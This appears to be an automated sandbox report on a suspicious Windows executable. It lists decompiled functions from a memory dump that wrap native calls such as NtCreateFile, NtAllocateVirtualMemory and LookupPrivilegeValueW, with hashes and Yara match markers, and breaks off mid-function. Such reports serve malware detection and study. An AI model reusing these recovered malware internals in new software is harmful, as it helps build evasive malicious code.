API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181BB, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004181BB(void* __eax, void* __ecx, void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				void* _v117;
				long _t24;
				void* _t38;

				_t18 = _v0;
				_push(_t39);
				_t4 = _t18 + 0xc40; // 0xc40
				E00418DC0(_t38, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t24;
			}

0x004181c3
0x004181c9
0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3624d6d70c73f83c47ae87d0402c30287ef3673e84eb2d1febaa6a73ca1742c4
Instruction ID: 98130ee096ab4424c447560364ac70a163284a93556d286c16d9a67c5658b4e6
Opcode Fuzzy Hash: 3624d6d70c73f83c47ae87d0402c30287ef3673e84eb2d1febaa6a73ca1742c4
Instruction Fuzzy Hash: 2101AFB2201108AFCB18CF99DC95EEB77A9AF8C354F15824CFA4D97241DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041839A(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;
				void* _t21;

				_push(0xffffffa9);
				asm("adc eax, 0x55bc6b8a");
				_t10 = _v0;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DC0(_t21, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}

0x0041839a
0x0041839c
0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b88c5430dd830b0a9d975b0e1c90f952e7ee11f2c01b9427c9d254ebfb2e5a78
Instruction ID: d67cffcdd7345de866234c730644e7dd44cf7ed50a5a7b6d7760c40a54a769c5
Opcode Fuzzy Hash: b88c5430dd830b0a9d975b0e1c90f952e7ee11f2c01b9427c9d254ebfb2e5a78
Instruction Fuzzy Hash: C0F0F8B6200218ABDB14DF89DC81EA777A9AF8C764F158659FA1897281C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00F398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F398FA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81d99ad462f64891027cc098ab8e8c5415b78e2e6ab03afbf63ed0d9ea076a2c
Instruction ID: ec00d66c8ca18143dba1ea04a6b4d0ad59e3521332d13b9a85a520433ebe1286
Opcode Fuzzy Hash: 81d99ad462f64891027cc098ab8e8c5415b78e2e6ab03afbf63ed0d9ea076a2c
Instruction Fuzzy Hash: 9C90026170100502D20171594444616240A97D0381F91C032A6015595FCA658992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00F39860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3986A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb988c773ccbe7ad3d602c3c711209e1b0608cbda1fab7c858a9ef6e333d2323
Instruction ID: 93be7d1b8d0a7f616b1535961673c17e25c4b2cc2baebf22138575fb18dc3135
Opcode Fuzzy Hash: fb988c773ccbe7ad3d602c3c711209e1b0608cbda1fab7c858a9ef6e333d2323
Instruction Fuzzy Hash: 8290027130100413D21161594544707240997D0381F91C422A5415598E96968952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00F39840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3984A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: feda083d63f596c942410dc6cf3eb2494bd1e2a8140852214202feceb1875ae1
Instruction ID: d0ef739ba088e7c5e381cc6eeefce8802007bad0c051fe54d1c6aedafe4bb01f
Opcode Fuzzy Hash: feda083d63f596c942410dc6cf3eb2494bd1e2a8140852214202feceb1875ae1
Instruction Fuzzy Hash: DD900261342041525645B15944445076406A7E0381791C022A6405990D85669856F661

Uniqueness

Uniqueness Score: -1.00%

Function 00F399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F399AA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 727567465298ba69fe8292555cf22ac7de7dff2aa0e45be85d686785e434180e
Instruction ID: 2082cc2a6b31e9ce0c58e37e39ed89b3375a6f322f584454d4c470424f0f4242
Opcode Fuzzy Hash: 727567465298ba69fe8292555cf22ac7de7dff2aa0e45be85d686785e434180e
Instruction Fuzzy Hash: B19002A134100442D20061594454B062405D7E1341F51C025E6055594E8659CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00F39910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3991A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd13ad223e2cedb449818af63cc8d5a15dbc9a2bc34c1afb19ce0bd59ed60c96
Instruction ID: c2657d66bff086d65c107ccfb8a51a33c9b88b2e2ec3972032e5fd7bc91db78b
Opcode Fuzzy Hash: bd13ad223e2cedb449818af63cc8d5a15dbc9a2bc34c1afb19ce0bd59ed60c96
Instruction Fuzzy Hash: 959002B130100402D24071594444746240597D0341F51C021AA055594F86998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F39A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F39A5A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07831fb082715ac5866fc685e61b38a467bbe48f5911e2af5f30c7b1a3ed7035
Instruction ID: 3b969833f1f4a63e2d45e7408f1f55fecb107c5a9463ccd908cb385737355103
Opcode Fuzzy Hash: 07831fb082715ac5866fc685e61b38a467bbe48f5911e2af5f30c7b1a3ed7035
Instruction Fuzzy Hash: 2390026131180042D30065694C54B07240597D0343F51C125A5145594DC9558861B561

Uniqueness

Uniqueness Score: -1.00%

Function 00F39A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F39A2A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4cd80b70dc7f25a9beb23ef8bdc573d292f6fbf0517c15f11783aec0ae0f6c9
Instruction ID: bc057eb0c29182dd9ceee4590c39c5feca1d92b94eb1c8632f3cf1cf6207ab32
Opcode Fuzzy Hash: d4cd80b70dc7f25a9beb23ef8bdc573d292f6fbf0517c15f11783aec0ae0f6c9
Instruction Fuzzy Hash: 62900261701000424240716988849066405BBE1351751C131A5989590E85998865B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F39A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F39A0A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4226d93c063ae418f74962c00f415c5b1f1bb6759c5b1d61e9de31a89efde625
Instruction ID: 8b4183e2853c2562656df47b5e6e6ce58ea7fd66d6030f42a5b156c2bdca16d9
Opcode Fuzzy Hash: 4226d93c063ae418f74962c00f415c5b1f1bb6759c5b1d61e9de31a89efde625
Instruction Fuzzy Hash: B990027130140402D2006159485470B240597D0342F51C021A6155595E86658851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00F395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F395DA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1fe8270ec6ec5347e80584850be2cea466c6e4d3168849bb4539f6b7125dcdcc
Instruction ID: 793ca0a4391c8e70e4c2a0adf67fe5b3dfad74403e6367c1d2cecadb544800dd
Opcode Fuzzy Hash: 1fe8270ec6ec5347e80584850be2cea466c6e4d3168849bb4539f6b7125dcdcc
Instruction Fuzzy Hash: B69002A130200003420571594454616640A97E0341B51C031E60055D0EC5658891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00F39540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3954A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96a50a50dfaca785ac55a76dcb75f20ef25e320e43b3f3a271caf55e5bae1c21
Instruction ID: 86dfdb635562a64923bdf0a6ff02bc81de77e74ca671d1331b8ca0dc8eaf42d1
Opcode Fuzzy Hash: 96a50a50dfaca785ac55a76dcb75f20ef25e320e43b3f3a271caf55e5bae1c21
Instruction Fuzzy Hash: 59900265311000030205A5590744507244697D5391351C031F6006590DD6618861B161

Uniqueness

Uniqueness Score: -1.00%

Function 00F396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F396EA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00f9c0aa86cc9aea40b5402bff06eccec6fa70a8fa441d4d514911e7f29d2935
Instruction ID: 0cb50810087998b9677537bb3da6696010890f69f851bc440aee25d467174788
Opcode Fuzzy Hash: 00f9c0aa86cc9aea40b5402bff06eccec6fa70a8fa441d4d514911e7f29d2935
Instruction Fuzzy Hash: A190027130108802D2106159844474A240597D0341F55C421A9415698E86D58891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00F39660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3966A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 019ac943c504029b6e6a5aee1914b1e6f0f4f73b82f26a0e5b1a44954578d382
Instruction ID: 3f0e5ed94325fa40e02022d3f187ac25f93d8ffea94690d246113637f36163d3
Opcode Fuzzy Hash: 019ac943c504029b6e6a5aee1914b1e6f0f4f73b82f26a0e5b1a44954578d382
Instruction Fuzzy Hash: DD90027130100802D2807159444464A240597D1341F91C025A5016694ECA558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F39FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F39FEA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 482afb148e797b666ca3987208257c9145e55c32c5a1891bd601692f944279aa
Instruction ID: 15c7f6dec10c74a015259b3be85800a801b9d4f4437d1ef0b2556d7b7457d24b
Opcode Fuzzy Hash: 482afb148e797b666ca3987208257c9145e55c32c5a1891bd601692f944279aa
Instruction Fuzzy Hash: 2890027131114402D21061598444706240597D1341F51C421A5815598E86D58891B162

Uniqueness

Uniqueness Score: -1.00%

Function 00F397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F397AA

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1caf7e9eda716643277f146ce78851e584c3d4be015ec55a5e5f3d9187b20a2d
Instruction ID: 41c113f4be97d79c92732d893f1a37f10115210501a824669ac3411ac67694da
Opcode Fuzzy Hash: 1caf7e9eda716643277f146ce78851e584c3d4be015ec55a5e5f3d9187b20a2d
Instruction Fuzzy Hash: D390026130100003D240715954586066405E7E1341F51D021E5405594DD9558856B262

Uniqueness

Uniqueness Score: -1.00%

Function 00F39780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3978A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f238ad937f8f9546d392db7ec88c3c8be21413f81c2ae05fb45a376b3f0f8b82
Instruction ID: 0df81d73f547bfea8f7ff1d65e2d7a9754a313da174d57864d08aba4c5a47e57
Opcode Fuzzy Hash: f238ad937f8f9546d392db7ec88c3c8be21413f81c2ae05fb45a376b3f0f8b82
Instruction Fuzzy Hash: A390026931300002D2807159544860A240597D1342F91D425A5006598DC9558869B361

Uniqueness

Uniqueness Score: -1.00%

Function 00F39710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00F3971A

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88cc9efcb952a3bc27ff3d8efd7c1e696407cd747731cfb1137cc750b4bab8c5
Instruction ID: 3134aaba8c58aae2c3a48d55943308e7658444bbd9d1e6482b1586fef79f227b
Opcode Fuzzy Hash: 88cc9efcb952a3bc27ff3d8efd7c1e696407cd747731cfb1137cc750b4bab8c5
Instruction Fuzzy Hash: 9190027130100402D20065995448646240597E0341F51D021AA015595FC6A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00418621(void* __eax, void* __ebx, WCHAR* _a4, struct _LUID* _a8) {
				WCHAR* _v0;
				intOrPtr _v4;
				int _t13;
				void* _t20;

				_push(0xffffffca);
				_push(cs);
				asm("out 0xc5, eax");
				_t10 = _v4;
				E00418DC0(_t20, _v4, _v4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_v0, _a4, _a8); // executed
				return _t13;
			}

0x00418626
0x00418628
0x0041862a
0x00418633
0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1a910704f1adafad4b5ac440484034ac21d7cbe4cbbaf45616fc734eb44ddcac
Instruction ID: b26a37f2d534f7847875ba451b01892abb2004ca2779ff26aca338843e773226
Opcode Fuzzy Hash: 1a910704f1adafad4b5ac440484034ac21d7cbe4cbbaf45616fc734eb44ddcac
Instruction Fuzzy Hash: 90E0EDB22002186BCB10EF94DC81ED733A9EF48260F008259BD0CA7381C934E8408BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418504, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418504() {
				int _v0;
				intOrPtr _v4;
				intOrPtr _v117;
				void* _t17;

				asm("sahf");
				asm("int3");
				asm("fdivp st5, st0");
				_push(cs);
				_v117 = ss;
				_t9 = _v4;
				E00418DC0(_t17, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}

0x00418504
0x00418505
0x00418508
0x0041850e
0x0041850f
0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 97cc3622ab925d1e97cc409cfcdf7d8a0a72a1fc5950d025548aee79328bfc77
Instruction ID: cfed72ae87aab8b3c9a29661fabcf931e8b822c4b11b5d6140a1c857f51c964e
Opcode Fuzzy Hash: 97cc3622ab925d1e97cc409cfcdf7d8a0a72a1fc5950d025548aee79328bfc77
Instruction Fuzzy Hash: BDE0DFB2A202007AD624EF24CC85EC73768DF19790F01891CF9196B242E630AE028AE0

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
